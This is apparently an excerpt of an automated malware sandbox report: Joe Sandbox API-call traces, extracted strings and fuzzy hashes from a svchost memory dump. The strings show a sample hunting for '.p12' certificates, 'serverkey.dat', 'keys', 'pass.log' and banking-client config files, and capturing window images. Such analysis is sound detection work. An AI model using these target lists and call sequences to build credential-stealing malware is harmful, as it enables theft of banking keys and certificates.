                                                                                                                                                                                                            • FindNextFileA.KERNEL32(00000000,?), ref: 02C8BCAF
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6D1DA3E6), ref: 02C8BCE4
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000), ref: 02C8BD1E
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02C8BD28
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02C8BD30
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C8BD3F
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 02C8BD46
                                                                                                                                                                                                            • SetErrorMode.KERNEL32(?), ref: 02C8BF52
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Error$File$DirectoryDriveFindLastModePathmemset$AdminAttributesBackslashCreateCurrentFirstFolderLogicalMakeNextStringsSystemTypeUser
                                                                                                                                                                                                            • String ID: *.00*$.txt$.zip$6D1DA3E6$asus$found.$keys$path
                                                                                                                                                                                                            • API String ID: 3801700313-3819906757
                                                                                                                                                                                                            • Opcode ID: 2ccc76992e657d32ddd7d02eb9622968297ea05fd662e1f6c6d1d3d8a7a41782
                                                                                                                                                                                                            • Instruction ID: eb0aa9984d832d5777501823ad65b4b7dba08da0154381e56215e5f837fe31a9
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2ccc76992e657d32ddd7d02eb9622968297ea05fd662e1f6c6d1d3d8a7a41782
                                                                                                                                                                                                            • Instruction Fuzzy Hash: FFC1F4315087818FC716DF3894687ABBBE5AFC9348F188A5DE9C9C7250EB31DA09C791
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C8D0E7
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C8D109
                                                                                                                                                                                                            • GetLogicalDriveStringsA.KERNEL32(00000104,?), ref: 02C8D128
                                                                                                                                                                                                            • SetErrorMode.KERNEL32(00000001), ref: 02C8D141
                                                                                                                                                                                                            • GetDriveTypeA.KERNEL32(?), ref: 02C8D195
                                                                                                                                                                                                            • SetCurrentDirectoryA.KERNEL32(?), ref: 02C8D1A4
                                                                                                                                                                                                            • FindFirstFileA.KERNEL32(?,?), ref: 02C8D1F1
                                                                                                                                                                                                            • GetFileAttributesA.KERNEL32(?), ref: 02C8D20A
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,found.), ref: 02C8D221
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,asus), ref: 02C8D238
                                                                                                                                                                                                            • FindNextFileA.KERNEL32(00000000,?), ref: 02C8D24F
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6D1DA354), ref: 02C8D284
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000), ref: 02C8D2BE
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02C8D2C8
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02C8D2D0
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C8D2DF
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 02C8D2E6
                                                                                                                                                                                                            • SetErrorMode.KERNEL32(?), ref: 02C8D4F2
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Error$File$DirectoryDriveFindLastModePathmemset$AdminAttributesBackslashCreateCurrentFirstFolderLogicalMakeNextStringsSystemTypeUser
                                                                                                                                                                                                            • String ID: *.00*$.txt$.zip$6D1DA354$asus$found.$keys$path
                                                                                                                                                                                                            • API String ID: 3801700313-2841153246
                                                                                                                                                                                                            • Opcode ID: 425eb8cc08128ed1b95f4e296e8d3dab3b1afadf694fd2b6d9cf7f05b51b0efc
                                                                                                                                                                                                            • Instruction ID: aa9f37e62b3eb9a5c461c1e9d8a0575e99d5f0c0cb5e9c87025faf26779bf6c5
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 425eb8cc08128ed1b95f4e296e8d3dab3b1afadf694fd2b6d9cf7f05b51b0efc
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4AC1D8715087818FC716DF349858BABBBE5AFC5349F148A5DE8CAD7280EB30D609C792
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • IsWindow.USER32(?), ref: 02C7BE9A
                                                                                                                                                                                                            • IsIconic.USER32(?), ref: 02C7BEA5
                                                                                                                                                                                                            • GetWindowInfo.USER32(?,?), ref: 02C7BF02
                                                                                                                                                                                                            • GetAncestor.USER32(?,00000003,?,755730D0), ref: 02C7BF27
                                                                                                                                                                                                            • GetWindow.USER32(?,00000003), ref: 02C7BFA0
                                                                                                                                                                                                            • IsWindow.USER32(?), ref: 02C7BFC8
                                                                                                                                                                                                            • IsIconic.USER32(?), ref: 02C7BFD3
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C7C002
                                                                                                                                                                                                            • GetWindow.USER32(?,00000005), ref: 02C7C026
                                                                                                                                                                                                            • GetWindow.USER32(00000000), ref: 02C7C029
                                                                                                                                                                                                              • Part of subcall function 02C7CC80: GetClassNameA.USER32(?,?,00000101), ref: 02C7CC96
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Window$Iconic$AncestorClassInfoNamememset
                                                                                                                                                                                                            • String ID: <$<
                                                                                                                                                                                                            • API String ID: 3351429209-213342407
                                                                                                                                                                                                            • Opcode ID: 282933c1f680c8cb9f3700dd2a73de88c1a8472c9d72b5b6ea3dba8f9ddf64ca
                                                                                                                                                                                                            • Instruction ID: c43446ad1351886e48742841b18c3635539a3145da3112e01542b0426cebb2c5
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 282933c1f680c8cb9f3700dd2a73de88c1a8472c9d72b5b6ea3dba8f9ddf64ca
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 18D1D470D00219AFDB26CFA5DC84BAEBBB9EF84708F14465AE505A7280DB709F41CF91
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetDriveTypeA.KERNEL32(?), ref: 02C8BBF5
                                                                                                                                                                                                            • SetCurrentDirectoryA.KERNEL32(?), ref: 02C8BC04
                                                                                                                                                                                                            • FindFirstFileA.KERNEL32(?,?), ref: 02C8BC51
                                                                                                                                                                                                            • GetFileAttributesA.KERNEL32(?), ref: 02C8BC6A
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,found.), ref: 02C8BC81
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,asus), ref: 02C8BC98
                                                                                                                                                                                                            • FindNextFileA.KERNEL32(00000000,?), ref: 02C8BCAF
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6D1DA3E6), ref: 02C8BCE4
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000), ref: 02C8BD1E
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02C8BD28
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02C8BD30
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C8BD3F
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 02C8BD46
                                                                                                                                                                                                            • SetErrorMode.KERNEL32(?), ref: 02C8BF52
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ErrorFile$DirectoryFindLastPath$AdminAttributesBackslashCreateCurrentDriveFirstFolderMakeModeNextSystemTypeUser
                                                                                                                                                                                                            • String ID: *.00*$.txt$.zip$6D1DA3E6$asus$found.$keys$path
                                                                                                                                                                                                            • API String ID: 3516781098-3819906757
                                                                                                                                                                                                            • Opcode ID: 1f52f668baf0c2e699368ab5db4ddecb56b2d5b78d591a07ef66356118f56ea5
                                                                                                                                                                                                            • Instruction ID: 663f24dd68829ed58e38b891f7cb07a8d44e847048a019257ef6a73785fdd551
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1f52f668baf0c2e699368ab5db4ddecb56b2d5b78d591a07ef66356118f56ea5
                                                                                                                                                                                                            • Instruction Fuzzy Hash: D0A1E4315087868FC716DB3494687ABBBE5EFC934DF188A59E8C9C7210EB31DA09C791
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetDriveTypeA.KERNEL32(?), ref: 02C8D195
                                                                                                                                                                                                            • SetCurrentDirectoryA.KERNEL32(?), ref: 02C8D1A4
                                                                                                                                                                                                            • FindFirstFileA.KERNEL32(?,?), ref: 02C8D1F1
                                                                                                                                                                                                            • GetFileAttributesA.KERNEL32(?), ref: 02C8D20A
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,found.), ref: 02C8D221
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,asus), ref: 02C8D238
                                                                                                                                                                                                            • FindNextFileA.KERNEL32(00000000,?), ref: 02C8D24F
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6D1DA354), ref: 02C8D284
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000), ref: 02C8D2BE
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02C8D2C8
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02C8D2D0
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C8D2DF
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 02C8D2E6
                                                                                                                                                                                                            • SetErrorMode.KERNEL32(?), ref: 02C8D4F2
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ErrorFile$DirectoryFindLastPath$AdminAttributesBackslashCreateCurrentDriveFirstFolderMakeModeNextSystemTypeUser
                                                                                                                                                                                                            • String ID: *.00*$.txt$.zip$6D1DA354$asus$found.$keys$path
                                                                                                                                                                                                            • API String ID: 3516781098-2841153246
                                                                                                                                                                                                            • Opcode ID: 7e1c5c9da2f9c3035f93d04b31bb37274a3f15e89969deb067b6893d67ad4339
                                                                                                                                                                                                            • Instruction ID: ab943dccc9a927d00b5d65f13d034dea180e4f10a05dfd6fd7655d91402de88a
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7e1c5c9da2f9c3035f93d04b31bb37274a3f15e89969deb067b6893d67ad4339
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 30A1F8315087858FC716DB349468BABBBE5AFC5349F18CA58E8CAC7240EB31D509C791
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C7119E
                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,7556F570), ref: 02C711BD
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(00000000,java), ref: 02C711D5
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(00000000,.exe), ref: 02C711EB
                                                                                                                                                                                                            • StrStrIW.SHLWAPI(?,.p12,00000000), ref: 02C7120F
                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 02C71231
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,?), ref: 02C7124E
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 02C71255
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C71265
                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 02C71281
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02C89ED0,00000000,00000000,00000000), ref: 02C71295
                                                                                                                                                                                                            • StrStrIW.SHLWAPI(?,serverkey.dat,00000000), ref: 02C712B4
                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 02C712E5
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,?), ref: 02C71302
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 02C71309
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C71319
                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 02C71335
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02C8D540,00000000,00000000,00000000), ref: 02C71349
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02C8EB60,00000000,00000000,00000000), ref: 02C71386
                                                                                                                                                                                                              • Part of subcall function 02C89E20: PathAddBackslashA.SHLWAPI(6d1da3b2), ref: 02C89E47
                                                                                                                                                                                                              • Part of subcall function 02C89E20: PathFileExistsA.SHLWAPI(?), ref: 02C89EB0
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02C7139E
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C713AF
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ByteCharHeapMultiWide$CreateThreadmemset$AllocFileHandlePathProcess$BackslashCloseExistsInformationModuleName
                                                                                                                                                                                                            • String ID: .exe$.p12$java$serverkey.dat
                                                                                                                                                                                                            • API String ID: 183229269-3502489836
                                                                                                                                                                                                            • Opcode ID: f680c842c16c72ab64df9a65bb09bd1b379547037e350193ea1be9a47f736af0
                                                                                                                                                                                                            • Instruction ID: 11bba8a6c2a8effb5c3e6ee5715992e5dc9e33b41e28deec2c99e8fae3ac34ab
                                                                                                                                                                                                            • Opcode Fuzzy Hash: f680c842c16c72ab64df9a65bb09bd1b379547037e350193ea1be9a47f736af0
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9151E671E8522576EB319A618C49FEB7E6CDF81B55F184354BD0DAA1C0EBB0DA00CAF4
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                              • Part of subcall function 02C93170: memset.MSVCRT ref: 02C93194
                                                                                                                                                                                                              • Part of subcall function 02C93170: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02C9319F
                                                                                                                                                                                                            • OpenProcess.KERNEL32(001FFFFF,00000000,00000000,ctunnel.exe,?,75497390,?), ref: 02C8B83C
                                                                                                                                                                                                            • GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104), ref: 02C8B85B
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02C8B86D
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C8B87E
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6D1DA3E6), ref: 02C8B8A7
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000), ref: 02C8B8E1
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02C8B8EB
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02C8B8F3
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C8B904
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 02C8B90B
                                                                                                                                                                                                            • GetFileAttributesA.KERNEL32(?), ref: 02C8B941
                                                                                                                                                                                                            • SetCurrentDirectoryA.KERNEL32(?), ref: 02C8B980
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6D1DA3E6,?,?), ref: 02C8B9C7
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6D1DA3E6,ctunnel.exe,?,75497390,?), ref: 02C8BAA7
                                                                                                                                                                                                            • PathFileExistsA.SHLWAPI(?), ref: 02C8BB09
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Path$BackslashFile$CreateDirectoryErrorHandleLast$AdminAttributesCloseCurrentExistsFolderInformationMakeModuleNameOpenProcessSnapshotSystemToolhelp32Usermemset
                                                                                                                                                                                                            • String ID: 6D1DA3E6$\$ctunnel.exe$ctunnel.zip$pass.log$path_ctunnel.txt
                                                                                                                                                                                                            • API String ID: 3886636124-4147626819
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 02C90C10
                                                                                                                                                                                                            • PathFindFileNameA.SHLWAPI(?), ref: 02C90C1D
                                                                                                                                                                                                            • PathFileExistsA.SHLWAPI(ISClient.cfg), ref: 02C90C32
                                                                                                                                                                                                              • Part of subcall function 02C76570: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,?,?,02C86BCC,?,00000000), ref: 02C76596
                                                                                                                                                                                                              • Part of subcall function 02C76570: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,02C86BCC,?,00000000), ref: 02C765B7
                                                                                                                                                                                                              • Part of subcall function 02C76570: GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,02C86BCC,?,00000000), ref: 02C765DD
                                                                                                                                                                                                              • Part of subcall function 02C76570: RtlAllocateHeap.NTDLL(00000000,?,?,?,?,?,02C86BCC,?,00000000), ref: 02C765E4
                                                                                                                                                                                                              • Part of subcall function 02C76570: memset.MSVCRT ref: 02C765F4
                                                                                                                                                                                                              • Part of subcall function 02C76570: ReadFile.KERNEL32(00000000,00000000,?,00000000,00000000,?,?,?,?,?,02C86BCC,?), ref: 02C76616
                                                                                                                                                                                                              • Part of subcall function 02C76570: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,02C86BCC,?), ref: 02C76622
                                                                                                                                                                                                              • Part of subcall function 02C76570: HeapValidate.KERNEL32(00000000,?,?,?,?,?,02C86BCC,?), ref: 02C76629
                                                                                                                                                                                                              • Part of subcall function 02C76570: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,02C86BCC,?), ref: 02C76636
                                                                                                                                                                                                              • Part of subcall function 02C76570: HeapFree.KERNEL32(00000000,?,?,?,?,?,02C86BCC,?), ref: 02C7663D
                                                                                                                                                                                                              • Part of subcall function 02C76570: GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C7665D
                                                                                                                                                                                                              • Part of subcall function 02C76570: CloseHandle.KERNEL32(00000000), ref: 02C7666E
                                                                                                                                                                                                              • Part of subcall function 02C76570: IsBadWritePtr.KERNEL32(?,00000004), ref: 02C7667E
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(00000000,GKUZ=,?,00000000,00000001), ref: 02C90C7D
                                                                                                                                                                                                            • strstr.MSVCRT ref: 02C90C9D
                                                                                                                                                                                                            • strstr.MSVCRT ref: 02C90CAF
                                                                                                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}), ref: 02C90CDE
                                                                                                                                                                                                            • Sleep.KERNEL32(000003E8), ref: 02C90CEF
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 02C90CF6
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02C90D08
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C90D19
                                                                                                                                                                                                            • GetPrivateProfileStringA.KERNEL32(General,DefaultPrivateDir,00000000,?,00000104,?), ref: 02C90D67
                                                                                                                                                                                                            • CharUpperA.USER32(?), ref: 02C90D7E
                                                                                                                                                                                                            • CharUpperA.USER32(?), ref: 02C90D87
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: FileHeap$Handle$Process$CharCloseCreateInformationMutexNamePathUpperstrstr$AllocateExistsFindFreeModulePrivateProfileReadReleaseSizeSleepStringValidateWritememset
                                                                                                                                                                                                            • String ID: DefaultPrivateDir$GKUZ=$General$ISClient.cfg$Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}$P0Wu$interpro.ini
                                                                                                                                                                                                            • API String ID: 1392943061-1768425703
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • IsWindow.USER32(00000000), ref: 02C7C078
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C7C0BB
                                                                                                                                                                                                            • GetWindowRect.USER32(00000000,00000000), ref: 02C7C0CB
                                                                                                                                                                                                            • GetWindowLongA.USER32(00000000,000000F0), ref: 02C7C0E5
                                                                                                                                                                                                            • GetScrollBarInfo.USER32(00000000,000000FA,?,?,?,755730D0), ref: 02C7C100
                                                                                                                                                                                                            • GetScrollBarInfo.USER32(00000000,000000FB,0000003C,?,?,755730D0), ref: 02C7C12D
                                                                                                                                                                                                            • GetWindow.USER32(00000000,00000005), ref: 02C7C165
                                                                                                                                                                                                            • GetWindow.USER32(00000000), ref: 02C7C168
                                                                                                                                                                                                            • IsIconic.USER32(00000000), ref: 02C7C087
                                                                                                                                                                                                              • Part of subcall function 02C7B9D0: IsWindow.USER32(00000000), ref: 02C7B9ED
                                                                                                                                                                                                              • Part of subcall function 02C7B9D0: IsWindowVisible.USER32(00000000), ref: 02C7B9FC
                                                                                                                                                                                                              • Part of subcall function 02C7B9D0: GetWindowRect.USER32(00000000,?), ref: 02C7BA39
                                                                                                                                                                                                              • Part of subcall function 02C7B9D0: GetClassLongA.USER32(00000000,000000E6), ref: 02C7BA42
                                                                                                                                                                                                              • Part of subcall function 02C7B9D0: PrintWindow.USER32(00000000,?,00000000,?,755730D0,?,?,?,02C7843E), ref: 02C7BA55
                                                                                                                                                                                                              • Part of subcall function 02C7B9D0: RedrawWindow.USER32(00000000,00000000,00000000,00000485,00000000,?,?,755730D0,?,?,?,02C7843E), ref: 02C7BA7B
                                                                                                                                                                                                              • Part of subcall function 02C7B9D0: CreateRectRgn.GDI32(?,?,02C7843E,?), ref: 02C7BA91
                                                                                                                                                                                                              • Part of subcall function 02C7B9D0: GetWindowRgn.USER32(00000000,00000000), ref: 02C7BA9B
                                                                                                                                                                                                              • Part of subcall function 02C7B9D0: OffsetRgn.GDI32(00000000,?,?), ref: 02C7BAB5
                                                                                                                                                                                                              • Part of subcall function 02C7B9D0: SelectClipRgn.GDI32(?,00000000), ref: 02C7BAC0
                                                                                                                                                                                                              • Part of subcall function 02C7B9D0: BitBlt.GDI32(?,?,?,02C7843E,?,?,00000000,00000000,00CC0020), ref: 02C7BAE9
                                                                                                                                                                                                            • IsWindow.USER32(?), ref: 02C7C18E
                                                                                                                                                                                                            • IsIconic.USER32(?), ref: 02C7C19D
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C7C1CE
                                                                                                                                                                                                            • GetWindowRect.USER32(?,00000000), ref: 02C7C1DB
                                                                                                                                                                                                            • GetWindowLongA.USER32(?,000000F0), ref: 02C7C1F2
                                                                                                                                                                                                            • GetScrollBarInfo.USER32(?,000000FA,0000003C,?,?,755730D0), ref: 02C7C21D
                                                                                                                                                                                                            • GetScrollBarInfo.USER32(?,000000FB,0000003C,?,?,755730D0), ref: 02C7C255
                                                                                                                                                                                                            • GetWindow.USER32(?,00000005), ref: 02C7C292
                                                                                                                                                                                                            • GetWindow.USER32(00000000), ref: 02C7C295
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Window$InfoRectScroll$Long$Iconicmemset$ClassClipCreateOffsetPrintRedrawSelectVisible
                                                                                                                                                                                                            • String ID: <$<
                                                                                                                                                                                                            • API String ID: 3463799249-213342407
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C81BB2
                                                                                                                                                                                                              • Part of subcall function 02C81AC0: GetAncestor.USER32(00000000,00000002,?,00000000), ref: 02C81ACE
                                                                                                                                                                                                              • Part of subcall function 02C81AC0: GetWindowTextA.USER32(00000000,?,00000104), ref: 02C81AE9
                                                                                                                                                                                                              • Part of subcall function 02C81AC0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C81B47
                                                                                                                                                                                                              • Part of subcall function 02C81AC0: HeapValidate.KERNEL32(00000000), ref: 02C81B4A
                                                                                                                                                                                                              • Part of subcall function 02C81AC0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C81B57
                                                                                                                                                                                                              • Part of subcall function 02C81AC0: HeapFree.KERNEL32(00000000), ref: 02C81B5A
